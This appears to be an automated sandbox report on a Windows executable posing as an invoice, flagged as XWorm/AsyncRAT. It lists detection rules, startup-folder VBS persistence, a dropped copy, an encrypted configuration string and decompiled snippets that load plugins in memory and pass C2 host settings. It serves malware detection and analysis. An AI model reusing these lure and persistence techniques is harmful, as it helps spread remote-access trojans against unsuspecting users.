Source: COHC INVOI NO 2500385 .exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.COHC INVOI NO 2500385 .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.2.COHC INVOI NO 2500385 .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2448321976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: COHC INVOI NO 2500385 .exe, Bixixhzh.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Count.exe.0.dr, Bixixhzh.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, Settings.cs

Base64 encoded string: 'ZdLFu9RhGUbsO18wqknsSEb1hM1D9Eta4/RKWa/oV1SPelrzX3FZbSQJl29K9/ZGcMco1ryd0sgN8JH3OuM7CQ=='

Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@4/3@1/1

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1752:64:WilError_03
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Mutant created: NULL
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Mutant created: \Sessions\1\BaseNamedObjects\pQMh0JV136n0w49S

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ef40cdb0-9ab6-402a-946e-cbfb93372310

Jump to behavior

Source: COHC INVOI NO 2500385 .exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: COHC INVOI NO 2500385 .exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: COHC INVOI NO 2500385 .exe	Virustotal: Detection: 36%
Source: COHC INVOI NO 2500385 .exe	ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

File read: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe "C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe"
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process created: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe "C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe"
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 936
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process created: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe "C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe"	Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: COHC INVOI NO 2500385 .exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: COHC INVOI NO 2500385 .exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbWl source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.00000000013A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: b77a5c561934e089\System.pdb source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.00000000013B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.000000000140C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.000000000140C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000004042000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1355519997.0000000006540000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000004042000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1355519997.0000000006540000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\COHC INVOI NO 2500385 .PDB source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2448694210.0000000000DD8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\COHC INVOI NO 2500385 .PDB source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.000000000140C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.000000000140C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbm source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.000000000140C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2448694210.0000000000DD8000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: COHC INVOI NO 2500385 .exe, Btsaq.cs	.Net Code: Citerrzg System.AppDomain.Load(byte[])
Source: Count.exe.0.dr, Btsaq.cs	.Net Code: Citerrzg System.AppDomain.Load(byte[])
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.COHC INVOI NO 2500385 .exe.3ff2130.6.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.COHC INVOI NO 2500385 .exe.64e0000.11.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.COHC INVOI NO 2500385 .exe.64e0000.11.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.COHC INVOI NO 2500385 .exe.64e0000.11.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.COHC INVOI NO 2500385 .exe.64e0000.11.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.COHC INVOI NO 2500385 .exe.64e0000.11.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.COHC INVOI NO 2500385 .exe.3f24d90.3.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.COHC INVOI NO 2500385 .exe.3f24d90.3.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.COHC INVOI NO 2500385 .exe.3f24d90.3.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.COHC INVOI NO 2500385 .exe.3f24d90.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.COHC INVOI NO 2500385 .exe.3f24d90.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.COHC INVOI NO 2500385 .exe.62a0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COHC INVOI NO 2500385 .exe.62a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COHC INVOI NO 2500385 .exe.3ea9550.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COHC INVOI NO 2500385 .exe.3ea9550.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1351995919.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: COHC INVOI NO 2500385 .exe PID: 7828, type: MEMORYSTR

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_02E80C45 push edi; retf		0_2_02E80C52
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_06C370BC pushfd ; ret		0_2_06C370C1

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	File created: \cohc invoi no 2500385 .exe
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	File created: \cohc invoi no 2500385 .exe
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	File created: \cohc invoi no 2500385 .exe	Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

File created: C:\Users\user\AppData\Roaming\Count.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
